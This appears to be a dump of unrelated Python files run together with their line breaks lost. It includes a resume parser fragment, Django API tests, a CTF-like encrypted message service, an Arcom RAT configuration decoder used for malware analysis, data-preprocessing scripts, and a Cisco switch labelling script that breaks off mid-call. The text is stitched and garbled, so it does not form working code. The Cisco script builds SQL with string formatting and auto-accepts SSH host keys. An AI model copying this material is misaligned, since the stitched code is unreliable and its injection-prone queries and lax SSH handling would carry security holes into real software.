#qualification['rank']=re.findall(r'\D\d{1,3}\D',wordstr.lower()) #line.append(wordstr) if re.search(r'\b[21][09][8901][0-9]',wordstr.lower()) and qualification['year']=='': qualification['year']=re.findall(r'\b[21][09][8901][0-9]',wordstr.lower()) line.append(wordstr) chunked_line = chunkParser.parse(self.lines[i])#regex chunk for searching univ name for subtree in chunked_line.subtrees(): if subtree.label()=='INSTI': for ind,leaves in enumerate(subtree): if leaves[0].lower() in nameofinstitutes and leaves[1]=='NNP' and qualification['institute']=='': qualification['institute']=' '.join([words[0]for words in subtree.leaves()]) line.append(wordstr) except Exception as e: print(traceback.format_exc()) if D1=='c\.?a': infoDict['%sinstitute'%D1] ="I.C.A.I" else: if qualification['institute']: infoDict['%sinstitute'%D1] = str(qualification['institute']) else: infoDict['%sinstitute'%D1] = "NULL" if qualification['year']: infoDict['%syear'%D1] = int(qualification['year'][0]) else: infoDict['%syear'%D1] =0 infoDict['%sline'%D1]=list(set(line)) except Exception as e: print(traceback.format_exc()) print(e) def Qualification(self,inputString,infoDict,debug=False): degre=[] #Q={'CAinformation':'','ICWAinformation':'','B.Cominformation':'','M.Cominformation':'','MBAinformation':''} #degree=[] #degree1=open('degree.txt','r').read().lower()#string to read from the txt file which contains all the degrees #degree=set(el for el in degree1.split('\n'))#saves all the degrees seperated by new lines,degree name contains both abbreviation and full names check file #qualification1={'CAline':'','CAcollege':'','CArank':'','CAyear':''} self.getQualification(self.inputString,infoDict,'c\.?a','chartered accountant') if infoDict['%sline'%'c\.?a']: degre.append('ca') self.getQualification(self.inputString,infoDict,'icwa','icwa') if infoDict['%sline'%'icwa']: degre.append('icwa') self.getQualification(self.inputString,infoDict,'b\.?com','bachelor of commerce') if infoDict['%sline'%'b\.?com']: degre.append('b.com') self.getQualification(self.inputString,infoDict,'m\.?com','masters of commerce') if infoDict['%sline'%'m\.?com']: degre.append('m.com') self.getQualification(self.inputString,infoDict,'mba','mba') if infoDict['%sline'%'mba']: degre.append('mba') if degre: infoDict['degree'] = degre else: infoDict['degree'] = "NONE" if debug: print("\n", pprint(infoDict), "\n") code.interact(local=locals()) return infoDict['degree'] if __name__ == "__main__": verbose = False if "-v" in str(sys.argv): verbose = True p = Parse(verbose) import sys from PyQt5.QtWidgets import * class Window(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Using Labels") self.setGeometry(50,50,350,350) self.UI() def UI(self): text1=QLabel("Hello Python",self) text2=QLabel("Hello World",self) text1.move(50,50) text2.move(200,150) self.show() def main(): App = QApplication(sys.argv) window=Window() sys.exit(App.exec_()) if __name__ == '__main__': main()Rennty/x-proba # -*- coding: utf-8 -*- from app import create_app app = create_app() # Models from sxmodel.Users import User setup.py10-100 import os import re from setuptools import setup, find_packages with open(os.path.join('src', 'braceexpand', '__init__.py')) as f: version = re.findall(r"^__version__ = '(.*)'", f.read(), re.M)[0] with open('README.rst') as f: README = f.read() setup( name='braceexpand', version=version, author='', author_email='', url='https://github.com/trendels/braceexpand', license='MIT', description='Bash-style brace expansion for Python', 
long_description=README, classifiers = [ 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 3', ], package_dir={'': 'src'}, packages=find_packages('src'), include_package_data=True, install_requires=[ 'typing;python_version<"3.5"' ], ) from django.test import TestCase from rest_framework.test import APITestCase from rest_framework import status from .models import Template class TemplateTest(APITestCase): fixtures = ['fixtures/user.json', 'fixtures/member.json', 'fixtures/progress.json'] def test_create_template(self): url = '/templates/' self.client.login(username='supervisor', password='') data = {'name': 'template biasa', 'description': 'template skripsi seperti biasanya'} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content) data = {'name': 'template lainnya'} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_update_template(self): url = '/templates/1/' self.client.login(username='supervisor', password='') data = {'name': 'template istimewa', 'description': 'template yang istimewa'} response = self.client.put(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) data = {'name': 'template biasa aja'} response = self.client.put(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) def test_delete_template(self): url = '/templates/1/' self.client.login(username='supervisor', password='') # data = {'name': 'template istimewa', 'description': 'template yang istimewa'} exist = Template.objects.filter(pk=1) self.assertEqual(exist.count(), 1) response = self.client.delete(url, format='json') self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, response.content) exist = Template.objects.filter(pk=1) self.assertEqual(exist.count(), 0) class ThesisTest(APITestCase): fixtures = ['fixtures/user.json', 'fixtures/member.json'] def test_create_theses(self): url = '/theses/' data = {'topic': 'the topic', 'title': 'the tittle'} self.client.login(username='supervisor', password='') response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) data = {'topic': 'the topic', 'title': 'the tittle', 'student': 2} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) class TaskTest(APITestCase): fixtures = ['fixtures/user.json', 'fixtures/member.json', 'fixtures/progress.json'] def test_create_task_for_student(self): url = '/tasks/' self.client.login(username='supervisor', password='') data = {'student': 'farhan', 'name': 'tugas baru', 'description': 'membuat tugas', 'duration': 5} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_update_student_task(self): url = '/tasks/2/' self.client.login(username='supervisor', password='') data = {'name': 'tugas update', 'description': 'membuat tugas update', 'duration': 10} response = self.client.put(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) self.assertEqual(response.data['name'], 'tugas update') def test_delete_student_task(self): url = '/tasks/2/' self.client.login(username='supervisor', password='') response = self.client.delete(url) 
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) def test_student_task(self): url = '/tasks/student_task/' self.client.login(username='supervisor', password='') response = self.client.get(url, format='json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) def test_comment_task(self): url = '/tasks/2/comment/' self.client.login(username='supervisor', password='') data = {'type': 'e', 'text': 'ayo dikerjakan'} response = self.client.post(url, data, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content) def test_validate_task(self): url = '/tasks/2/validate/' self.client.login(username='supervisor', password='') response = self.client.put(url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) # from deeppavlov import cos_sim_classifier # print(cos_sim_classifier.__class__) from deeppavlov.models import logreg_classifier print(logreg_classifier.__class__)0 # All rights reserved by forest fairy. # You cannot modify or share anything without sacrifice. # If you don't agree, keep calm and don't look at code bellow! __author__ = "VirtualV " __date__ = "$Apr 13, 2014 12:30:05 AM$" import ast from tests.benchmarks.tools.base import App class CFBench(App): """CFBench""" def __init__(self, attributes, serial): App.__init__(self, attributes, serial) def collect_results(self, res_doc): res = ast.literal_eval(self.getResults()) for x in res: res_doc.add_name(x[0]) res_doc.add_result(x[1].replace('%', '')) services/qdb/server/handler.py from aiohttp import web from ciphers import aes, xor from protos import get_msg_pb2, logins_pb2, response_pb2, request_pb2, set_msg_pb2, utils_pb2 from utils import Gate, Qubit ALGOS = { utils_pb2.Algo.AES: aes, utils_pb2.Algo.XOR: xor } class Handler: def __init__(self, bb84, db): self._bb84 = bb84 self._db = db def _process_request(self, request): client_qubits = list(map(Qubit.from_protobuf, request.qubits[:])) client_gates = list(map(Gate.from_protobuf, request.gates[:])) server_gates = self._bb84.generate_basis() bits = self._bb84.recieve(client_qubits, server_gates) key = self._bb84.generate_key(server_gates, client_gates, bits) return server_gates, key async def ping(self, request): return web.Response(status=200) async def get_logins(self, request): request = request_pb2.Request().FromString(await request.read()) server_gates, key = self._process_request(request) algo = ALGOS[request.algo] response = response_pb2.Response() response.gates.extend([x.to_protobuf() for x in server_gates]) logins = [] for login in await self._db.get_logins(): logins.append(algo.encrypt(key, login)) response.option.Extensions[logins_pb2.LOGINS].name.extend(logins) return web.Response(body=response.SerializeToString()) async def set_msg(self, request): request = request_pb2.Request().FromString(await request.read()) server_gates, key = self._process_request(request) algo = ALGOS[request.algo] login = request.option.Extensions[set_msg_pb2.SET_MSG_REQUEST].login msg = request.option.Extensions[set_msg_pb2.SET_MSG_REQUEST].msg encrypted_msg = algo.encrypt(key, msg) if not await self._db.check_login(login): await self._db.set_msg(login, encrypted_msg) response = response_pb2.Response() response.gates.extend([x.to_protobuf() for x in server_gates]) set_msg_proto = response.option.Extensions[set_msg_pb2.SET_MSG_RESPONSE] set_msg_proto.msg = encrypted_msg return web.Response(body=response.SerializeToString()) else: return web.Response(status=400) async def get_msg(self, request): 
request = request_pb2.Request().FromString(await request.read()) server_gates, key = self._process_request(request) algo = ALGOS[request.algo] login = request.option.Extensions[get_msg_pb2.GET_MSG_REQUEST].login if await self._db.check_login(login): msg = await self._db.get_msg(login) encrypted_msg = algo.encrypt(key, msg) response = response_pb2.Response() response.gates.extend([x.to_protobuf() for x in server_gates]) get_msg_proto = response.option.Extensions[get_msg_pb2.GET_MSG_RESPONSE] get_msg_proto.msg = encrypted_msg return web.Response(body=response.SerializeToString()) else: return web.Response(status=400)malwareconfig/decoders/arcom.py from base64 import b64decode from malwareconfig import crypto from malwareconfig.common import Decoder from malwareconfig.common import string_printable class Arcom(Decoder): decoder_name = "Arcom" decoder__version = 1 decoder_author = "@kevthehermit" decoder_description = "Arcom RAT Decoder" def __init__(self): self.config = {} def get_config(self): ''' This is the main entry :return: ''' key = "" file_data = self.file_info.file_data coded_config = file_data.split(b"\x18\x12\x00\x00")[1][:-8] decoded_config = b64decode(coded_config) clear_config = crypto.decrypt_blowfish(key, decoded_config).decode('utf-8') config_dict = {} parts = clear_config.split('|') if len(parts) > 3: config_dict["Domain"] = parts[0] config_dict["Port"] = parts[1] config_dict["Install Path"] = parts[2] config_dict["Install Name"] = parts[3] config_dict["Startup Key"] = parts[4] config_dict["Campaign ID"] = parts[5] config_dict["Mutex Main"] = parts[6] config_dict["Mutex Per"] = parts[7] config_dict["YPER"] = parts[8] config_dict["YGRB"] = parts[9] config_dict["Mutex Grabber"] = parts[10] config_dict["Screen Rec Link"] = parts[11] config_dict["Mutex 4"] = parts[12] config_dict["YVID"] = parts[13] config_dict["YIM"] = parts[14] config_dict["NO"] = parts[15] config_dict["Smart Broadcast"] = parts[16] config_dict["YES"] = parts[17] config_dict["Plugins"] = parts[18] config_dict["Flag1"] = parts[19] config_dict["Flag2"] = parts[20] config_dict["Flag3"] = parts[21] config_dict["Flag4"] = parts[22] config_dict["WebPanel"] = parts[23] config_dict["Remote Delay"] = parts[24] # Set the config to the class for use self.config = config_dict # OpenWeatherMap API Key weather_api_key = "" # Google API Key g_key = "" # Copyright (c) 2021 University System of Georgia and janki contributors # Distributed under the terms of the BSD-3-Clause License. 
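# --- Illustrative aside (not part of the original sources) -----------------------------------------------------------
# The small config stub above leaves weather_api_key and g_key as empty string literals. A minimal sketch of the usual
# alternative is given here purely as an assumption for illustration: the helper name and the environment-variable
# names below are made up and are not taken from the original code.
def _load_api_keys_from_env():
    """Sketch only: read the two keys the stub above hard-codes as empty strings from the environment instead."""
    import os
    # Hypothetical variable names; adjust to whatever the deployment actually defines.
    return os.environ.get("OPENWEATHERMAP_API_KEY", ""), os.environ.get("GOOGLE_API_KEY", "")
# ----------------------------------------------------------------------------------------------------------------------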
import json from pathlib import Path from typing import Text import jsonschema from ._version import __js__ HERE = Path(__file__).parent SCHEMA = ( HERE / "labextensions" / __js__["name"] / "schemas" / __js__["name"] / "plugin.json" ) REF = "$ref" ONE_OF = "oneOf" def make_validator( ref: Text = "#/definitions/api-collection", ) -> jsonschema.Draft7Validator: """return a schema from the source-of-truth, with an optional $ref""" schema = load_schema() schema.pop(ONE_OF, None) schema.pop(REF, None) schema[REF] = ref return jsonschema.Draft7Validator(schema) def load_schema(): return json.loads(SCHEMA.read_text(encoding="utf-8")) scripts/jpeg2tiff.py import cv2 # for i in ["Tumor", "TP53", "PTEN", "STK11", "KRAS", "NOTCH1"]: # image = cv2.imread("/Users/rh2740/Documents/pancan_imaging/DLCCA/Figures/Figure3-S3/{}/mosaic_0.jpeg".format(i)) # cv2.imwrite("/Users/rh2740/Documents/pancan_imaging/DLCCA/Figures/TIF/{}.tif".format(i, i), image) image = cv2.imread("/Users/rh2740/Documents/pancan_imaging/Results/immune/out/mosaic_2.jpeg") cv2.imwrite("/Users/rh2740/Documents/pancan_imaging/Results/immune/out/mosaic_2.tif", image) #-*- coding: utf_8 -*- # XXX/AAA.wav | AAA_1.wav "text1" # AAA_1.wav [0.0,1.2] | AAA_2.wav "text2" # AAA_2.wav [1.5,2.0] | BBB_1.wav "text3" # . | BBB_2.wav "text4" # XXX/BBB.wav | # BBB_1.wav [0.0,0.8] | # BBB_2.wav [1.1,1.9] | # . import os import sys import codecs FilterString=['', 'sil', 'noi', '*', 'music'] def filterTime(line): time = line[line.rfind('=')+1:] time = time.strip() return float(time[:time.find('.')+3]) def filterText(line): text = line[line.rfind('=')+1:] text = text.replace('"','') text = text.replace('。','') text = text.replace(' ','') text = text.strip() return text def transCodeType(sFile, sType, tFile, tType): fin = open(sFile, 'r') fout = open(tFile, 'w') text = fin.read().decode(sType) fout.write(text.encode(tType)) fin.close() fout.close() def ParseFile(curFile, fcout, ftout): count = 0 baseName = curFile[curFile.rfind('/')+1: curFile.rfind('.TextGrid')] pathName = 'XXX/%s.wav\n' % baseName fcout.write(pathName) transFile = '%s.TextGrid.bak' % baseName transCodeType(curFile, 'utf-16', transFile, 'utf-8') fin = open(transFile, 'r') while 1: line = fin.readline() if not line: break if line.find('item [2]') != -1: break if line.find('intervals [') != -1: line_xmin = fin.readline() line_xmax = fin.readline() line_text = fin.readline() xmin = filterTime(line_xmin) xmax = filterTime(line_xmax) text = filterText(line_text) if text in FilterString: continue count += 1 segWave = '%s_%d.wav [%f,%f]\n' % (baseName, count, xmin, xmax) segText = '%s_%d.wav %s\n' % (baseName, count, text) fcout.write(segWave) ftout.write(segText) fcout.write('.\n') fin.close() if os.path.exists(transFile): os.remove(transFile) if __name__ == '__main__': if len(sys.argv) != 4: print 'python %s inFileList outcutWavList outtrans' % sys.argv[0] sys.exit(1) if not os.path.exists(sys.argv[1]): print 'cannot find ', sys.argv[1] sys.exit(1) flist = open(sys.argv[1],'r') fcout = open(sys.argv[2],'w') ftout = open(sys.argv[3],'w') for curFile in flist: curFile = curFile.rstrip('\n') if not os.path.exists(curFile): print 'cannot find %s' % curFile continue ParseFile(curFile, fcout, ftout) flist.close() fcout.close() ftout.close() 0 from __future__ import print_function import _pickle as cPickle import os import sys import json import re sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) import utils period_strip = re.compile("(?!<=\d)(\.)(?!\d)") comma_strip = 
re.compile("(\d)(\,)(\d)") punct = [';', r"/", '[', ']', '"', '{', '}', '(', ')', '=', '+', '\\', '_', '-', '>', '<', '@', '`', ',', '?', '!'] def get_score(occurences): if occurences == 0: return 0 elif occurences == 1: return .3 elif occurences == 2: return .6 elif occurences == 3: return .9 else: return 1. def process_punctuation(inText): outText = inText for p in punct: if (p + ' ' in inText or ' ' + p in inText) \ or (re.search(comma_strip, inText) != None): outText = outText.replace(p, '') else: outText = outText.replace(p, ' ') outText = period_strip.sub("", outText, re.UNICODE) return outText def multiple_replace(text, wordDict): for key in wordDict: text = text.replace(key, wordDict[key]) return text def preprocess_answer(answer): answer = process_punctuation(answer) answer = answer.replace(',', '') return answer def get_answer_mode(answers): counts = {} for ans in answers: a = ans['answer'] counts[a] = counts.get(a, 0) + 1 max_count = 0 mode = None for c in counts: if max_count < counts[c]: max_count = counts[c] mode = c return mode def filter_answers(answers_dset, min_occurence): """This will change the answer to preprocessed version """ occurence = {} for ans_entry in answers_dset: answers = ans_entry['answers'] gtruth = get_answer_mode(answers) gtruth = preprocess_answer(gtruth) if gtruth not in occurence: occurence[gtruth] = set() img_id, _ = os.path.splitext(ans_entry['image']) occurence[gtruth].add(img_id) for answer in list(occurence): if len(occurence[answer]) < min_occurence: occurence.pop(answer) print('Num of answers that appear >= %d times: %d' % ( min_occurence, len(occurence))) return occurence def create_ans2label(occurence, name, cache_root='data/cache'): """Note that this will also create label2ans.pkl at the same time occurence: dict {answer -> whatever} name: prefix of the output file cache_root: str """ ans2label = {} label2ans = [] label = 0 for answer in occurence: label2ans.append(answer) ans2label[answer] = label label += 1 utils.create_dir(cache_root) cache_file = os.path.join(cache_root, name+'_ans2label.kvqa.pkl') cPickle.dump(ans2label, open(cache_file, 'wb')) cache_file = os.path.join(cache_root, name+'_label2ans.kvqa.pkl') cPickle.dump(label2ans, open(cache_file, 'wb')) return ans2label def compute_target(answers_dset, ans2label, split, cache_root='data/cache'): """Augment answers_dset with soft score as label ***answers_dset should be preprocessed*** Write result into a cache file """ target = [] for ans_entry in answers_dset: answers = ans_entry['answers'] answer_count = {} for answer in answers: answer_ = answer['answer'] answer_count[answer_] = answer_count.get(answer_, 0) + 1 labels = [] scores = [] for answer in answer_count: if answer not in ans2label: continue labels.append(ans2label[answer]) score = get_score(answer_count[answer]) scores.append(score) img_id, _ = os.path.splitext(ans_entry['image']) target.append({ 'question_id': img_id, 'image_id': img_id, 'labels': labels, 'scores': scores }) utils.create_dir(cache_root) cache_file = os.path.join(cache_root, split + '_target.kvqa.pkl') cPickle.dump(target, open(cache_file, 'wb')) return target def get_answer(qid, answers): for ans in answers: if ans['question_id'] == qid: return ans def get_question(qid, questions): for question in questions: if question['question_id'] == qid: return question if __name__ == '__main__': dataroot = 'data' answer_file = os.path.join(dataroot, 'KVQA_annotations_train.json') with open(answer_file, encoding='utf-8') as f: train_answers = json.load(f) answer_file 
= os.path.join(dataroot, 'KVQA_annotations_val.json') with open(answer_file, encoding='utf-8') as f: val_answers = json.load(f) answers = train_answers + val_answers occurence = filter_answers(answers, 3) ans2label = create_ans2label(occurence, 'trainval') compute_target(train_answers, ans2label, 'train') compute_target(val_answers, ans2label, 'val') FedAnt/python-collectiongarbage/cisco-descr-port.py ########## # Скрипт для подписи портов на коммутаторах cisco # !!! Переписать ########## import socket import subprocess import ipaddress import sqlite3 import paramiko import time import os import re # ---------------------------------------------------------------------------------------------------------------------- # Parametrs # ---------------------------------------------------------------------------------------------------------------------- # задаем диапазон ip адресов, в котором будем искать коммутаторы cisco ip_range = "172.16.1.0/24" # время задержки для параметра socket timeout = 5.0 # имя БД db_name = "desc.db" # путь до папки с файлами логов авторизации РС в сети dirName = "//someserver/path_to_logs" # Количество запросов ping до ожидания ответа устройства ping_counter = 4 # пользователь для подключения по ssh usr = 'someuser' # пароль для подключения по ssh pwd = open('', 'r').read() # порт для подключения по ssh port = 22 # Данные c какой строки читать (ключ + номер строки для mac-address table) nstr = 4 + 1 # список коммутаторов, которые можно подписывать sw_list = [] # список префиксов описания портов, которые можно подписывать ltada = [] # список префиксов описания портов, которые нельзя подписывать ltadd = [] # ---------------------------------------------------------------------------------------------------------------------- # ------------------------------------------------------ Functions # ---------------------------------------------------------------------------------------------------------------------- # ---------------------------------------------------------------------------------------------------------------------- # Блок с общими функциями def set_query_for_db(query): ''' Функция выполняет произвольный SQL запрос ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute(query) con.commit() con.close() def get_select_in_db_ex(query): ''' функция отправляющая в БД запрос ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute(query) data = cur.fetchall() con.close() if len(data): return data def get_select_in_db_exp(query, data): ''' функция отправляющая в БД запрос ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute(query, data) data = cur.fetchall() con.close() if len(data): return data def delete_data_from_db(tb_name, id_if): ''' функция удалеяет данные из указанной таблицы БД ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute("DELETE FROM %s WHERE %s" % (tb_name, id_if)) con.commit() con.close() def insert_data_to_db(query, datas): ''' Функция записывает в SQLite данных ''' con = sqlite3.connect(db_name) con.executemany(query, datas) con.commit() con.close() def update_data_to_db(query, data): ''' Функция записывает в SQLite данных ''' con = sqlite3.connect(db_name) con.execute(query, data) con.commit() con.close() def check_mac_in_db(tb_name, mac_addr): ''' Функция, которая роверяет наличие мак адреса в базе mac from files tb_name - имя БД из которой делаем запрос mac_addr - mac адрес в формате win ('000A5E492E8B'), который ищем в БД ''' con = sqlite3.connect(db_name) cur = con.cursor() 
    cur.execute("SELECT count() FROM '%s' WHERE mac_addr = '%s'" % (tb_name, mac_addr))
    data = cur.fetchall()
    con.close()
    if data[0][0] != 0:
        return True
    else:
        return False

def get_win_mac(mac):
    '''
    Convert a MAC address from Cisco format to the log-file format:
    50e5.49ce.bb40 -> 50E549CEBB40 (strip the dots and switch to upper case).
    '''
    return re.sub(r'\.', '', mac.upper())

def ssh_command(host, comm):
    '''
    Run a single command on a Cisco device over SSH.
    '''
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Connect to the switch (fix: the password argument was missing; use the module-level pwd)
    client.connect(hostname=host, username=usr, password=pwd, port=port)
    # Run the command
    stdin, stdout, stderr = client.exec_command(comm)
    # Read the output line by line
    data = stdout.readlines()
    # Close the connection to the switch
    client.close()
    return data

def ssh_commands(host, comms):
    '''
    Run a sequence of commands on a Cisco device over SSH.
    '''
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Connect to the switch (fix: the password argument was missing; use the module-level pwd)
    client.connect(hostname=host, username=usr, password=pwd, port=port)
    commands = ""
    for comm in comms:
        commands += comm + '\n'
    channel = client.invoke_shell()
    stdin = channel.makefile('wb')
    stdout = channel.makefile('rb')
    stdin.write(commands)
    stdout.close()
    stdin.close()
    client.close()

def date_to_second(t_date):
    '''
    :param t_date: timestamp in the form "2017-05-02 10:50:16"
    :return: the time in seconds since the epoch
    '''
    return time.mktime(time.strptime(t_date, "%Y-%m-%d %H:%M:%S"))

# ----------------------------------------------------------------------------------------------------------------------
# Block 1: scan the network and store the IP addresses of Cisco devices in the DB
def my_ping(ip_range):
    '''
    Ping a range of IP addresses and return the list of reachable devices.
    '''
    # Create the network
    ip_net = ipaddress.ip_network(ip_range)
    # Get all hosts on that network
    all_hosts = list(ip_net.hosts())
    # Configure subprocess to hide the console window
    info = subprocess.STARTUPINFO()
    info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    info.wShowWindow = subprocess.SW_HIDE
    ip_range_online = []
    # For each IP address in the subnet,
    # run the ping command with the subprocess.Popen interface
    for i in range(len(all_hosts)):
        for j in range(0, ping_counter):
            output = subprocess.Popen(['ping', '-n', '1', '-w', '500', str(all_hosts[i])],
                                      stdout=subprocess.PIPE, startupinfo=info).communicate()[0]
            # The two literals below match the Russian-language Windows ping output for
            # "destination host unreachable" and "request timed out"; they must stay as-is.
            if ("Заданный узел недоступен" in output.decode('cp866')):
                pass
            elif ("Превышен интервал ожидания для запроса" in output.decode('cp866')):
                pass
            else:
                print(str(all_hosts[i]) + " is Online")
                ip_range_online.append(str(all_hosts[i]))
                break
    return ip_range_online

def find_cisco_ip(ip_range_online):
    '''
    For the given list of addresses, find the devices that answer on port 22 with the banner "SSH-2.0-Cisco-1.25".
    '''
    ip_cisco_online = []
    for i in range(len(ip_range_online)):
        ip_device = ip_range_online[i]
        # print(str(ip_device))
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # sock = socket.socket()
            sock.settimeout(timeout)
            sock.connect((str(ip_device), 22))  # connect to port 22
            sock.settimeout(None)
        except:
            pass
        else:
            result = sock.recv(65536)  # next chunk of bytes
            if ("SSH-2.0-Cisco-1.25" in result.decode("utf-8")):
                ip_cisco_online.append(ip_device)
            sock.close()
            continue  # if the port is closed, move on to the next device
    return ip_cisco_online

# !!! Rewrite !!!
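# --- Illustrative aside (not part of the original script) ------------------------------------------------------------
# find_cisco_ip() above identifies Cisco switches by reading the SSH banner on port 22 and checking for the substring
# "SSH-2.0-Cisco-1.25". A minimal, self-contained sketch of that banner check is shown here; the helper name
# grab_ssh_banner and its defaults are assumptions made for illustration only, not part of the original code.
def grab_ssh_banner(ip_addr, port=22, timeout=5.0):
    '''Return the SSH banner sent by ip_addr:port, or an empty string if the port is closed or times out.'''
    import socket  # the script already imports socket at module level; the repeated import is harmless
    try:
        with socket.create_connection((str(ip_addr), port), timeout=timeout) as sock:
            return sock.recv(256).decode('utf-8', errors='replace')
    except OSError:
        return ''
# Usage sketch: [ip for ip in ip_range_online if 'SSH-2.0-Cisco' in grab_ssh_banner(ip)]
# ----------------------------------------------------------------------------------------------------------------------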
# def insert_ip_cisco_in_db(ip_cisco_online): ''' функция принимает диапазон ip адресов проверяет на существование этих IP адресов в БД и если они отсутствуют, то записывает их в БД ''' con = sqlite3.connect(db_name) cur = con.cursor() ip_for_insert = [] j = 0 for i in range(len(ip_cisco_online)): cur.execute("SELECT * FROM tb_switches WHERE ip_addr = '%s'" % ip_cisco_online[i]) data = cur.fetchall() if not len(data): ip_for_insert.append([]) ip_for_insert[j].append(ip_cisco_online[i]) ip_for_insert[j].append("1") j += 1 con.close() con = sqlite3.connect(db_name) con.executemany("INSERT INTO tb_switches (ip_addr, status) VALUES(?, ?)", ip_for_insert) con.commit() con.close() # !!! Переписать !!! # def insert_cisco_sign_db(): # Функция получает данные по коммутаторам switches = get_select_in_db_ex("select id_switch, ip_addr, name from tb_switches where status = 1") for switch in switches: print(switch[1]) datas = ssh_command(switch[1], "show version") for data in datas: # Получаем серийный номер if data.find("Model number") + 1 > 0: mn = data.split(": ")[1].strip() # Получаем версию прошивки elif data.find("IOS (tm)") + 1 > 0: ios = data.split(",")[0].split("e (")[1][0:-1].strip() # Получаем мак адрес коммутатора elif data.find("MAC Address") + 1 > 0: mac_addr = data.split(": ")[1].strip() # Получаем время работы коммутатора elif data.find("uptime") + 1 > 0: hostname = data.split(" ")[0].strip() print(ios) print(mn) print(mac_addr) print(hostname) # Обновляем название коммутатора if switch[2] == "": update_data_to_db("UPDATE tb_switches SET name = ? WHERE id_switch = ?", (hostname, switch[0])) print("!") print("--!!!---") # ---------------------------------------------------------------------------------------------------------------------- # 2 Блок по записи данных о mac адресах, из лог файлов входа в систему, в БД def get_datas_from_files_int(): ''' получение из log-файлов данных в сети Интернет-ГХК ''' # счетчик строк i = 0 # список списков с данными l = [] # считываем список файлов names = os.listdir(dirName) for name in names: # создаем внутри списка вложенные списки l.append([]) # получаем полное имя fullname = os.path.join(dirName, name) f = open(fullname, 'r') # получаем последую строку last_string = f.readlines()[-1] # делим последную строку на список l_last_string = (re.split('\|', last_string)) # дата и время l[i].append(l_last_string[0].strip(" ").replace('/', '-') + " " + l_last_string[1].strip(" ")) # имя РС l[i].append(l_last_string[2].strip(" ")) # ip адрес РС l[i].append(l_last_string[3].strip(" ").replace(' ', '')) # mac адрес РС l[i].append(l_last_string[4].strip(" ")[4:]) un_os = l_last_string[5].strip(" ").split(' OS:') # имя пользователя l[i].append(un_os[0].split("\\")[0]) l[i].append(un_os[0].split("\\")[1]) # версия ОС (6) l[i].append(un_os[1]) # время изменения файла (7) # l[i].append(datetime.fromtimestamp(os.path.getmtime(fullname))) i += 1 f.close() return l def get_datas_from_files_kc(dir_name): # получение из log-файлов данных в КС # счетчик строк i = 0 # список списков с данными l = [] # считываем список файлов names = os.listdir(dir_name) for name in names: # создаем внутри списка вложенные списки l.append([]) # получаем полное имя fullname = os.path.join(dir_name, name) f = open(fullname, 'r') # получаем последую строку last_string = f.readlines()[-1] # print (last_string) # делим последную строку на список l_last_string = (re.split('\|', last_string)) cur_string = l_last_string[0].split(';') # дата и время l[i].append(cur_string[0]) # hostname 
l[i].append(cur_string[1].split('\\')[1]) # username l[i].append(cur_string[2].split('\\')[1]) # mac-address l[i].append(cur_string[3]) # IP адрес l[i].append(cur_string[4].strip(' ').replace(' ', '')) # версия ОС l[i].append(cur_string[9]) i += 1 f.close() return l def get_datas_from_file_int(f_name): ''' Функция читающая один log-файл из сети Интернет-ГХК и разбивающая последную строку на поля таблицы tb_mac_from_files f_name - имя файла, которое мы анализируем этой функцией outdata - данные собранные для записи в БД tb_mac_from_files ''' # создаем внутри списка вложенные списки outdata = [] # получаем полное имя fullname = os.path.join(dirName, f_name) # открываем файл f = open(fullname, 'r') # получаем последую строку last_string = f.readlines()[-1] # делим последную строку на список l_last_string = (re.split('\|', last_string)) # дата и время входа пользователя в систему из log-файла (0) outdata.append(l_last_string[0].strip(" ").replace('/', '-') + " " + l_last_string[1].strip(" ")) # имя РС (1) outdata.append(l_last_string[2].strip(" ")) # ip адрес РС (2) outdata.append(l_last_string[3].strip(" ").replace(' ', '')) # mac адрес РС (3) outdata.append(l_last_string[4].strip(" ")[4:]) # ФИО пользователя (4) un_os = l_last_string[5].strip(" ").split(' OS:') # l[i].append(un_os[0]) outdata.append(un_os[0].split("\\")[0]) # логин пользователя (5) outdata.append(un_os[0].split("\\")[1]) # версия ОС (6) outdata.append(un_os[1]) # время изменения log-файла (7) # outdata.append(datetime.fromtimestamp(os.path.getmtime(fullname))) f.close() return outdata def set_datas_from_file(): ''' Функция опрашивает все log-файлы из папки глобальной переменной dirName и записывает эти данные в БД, в случае если запись об этой РС есть, то обновляет данные ''' # считываем список файлов f_names = os.listdir(dirName) # пробегаемся по файлам и смотрим надо ли данные по ним обновлять или записывать по новой for f_name in f_names: # получаем данные с последней строки читаемого файла f_name data_from_f = get_datas_from_file_int(f_name) # получаем из БД (tb_mac_from_files) строку содержащую mac-адрес из файла data_from_db = get_select_in_db_exp( "select * from tb_mac_from_files where mac_addr=:mac_addr", {"mac_addr": data_from_f[3], }) if (data_from_db == None): print("Insert - {}".format(data_from_f)) insert_data_to_db(''' INSERT INTO tb_mac_from_files (date_from_file, dns_name, ip_addr, mac_addr, fio, username, os) VALUES(?, ?, ?, ?, ?, ?, ?)''', ( 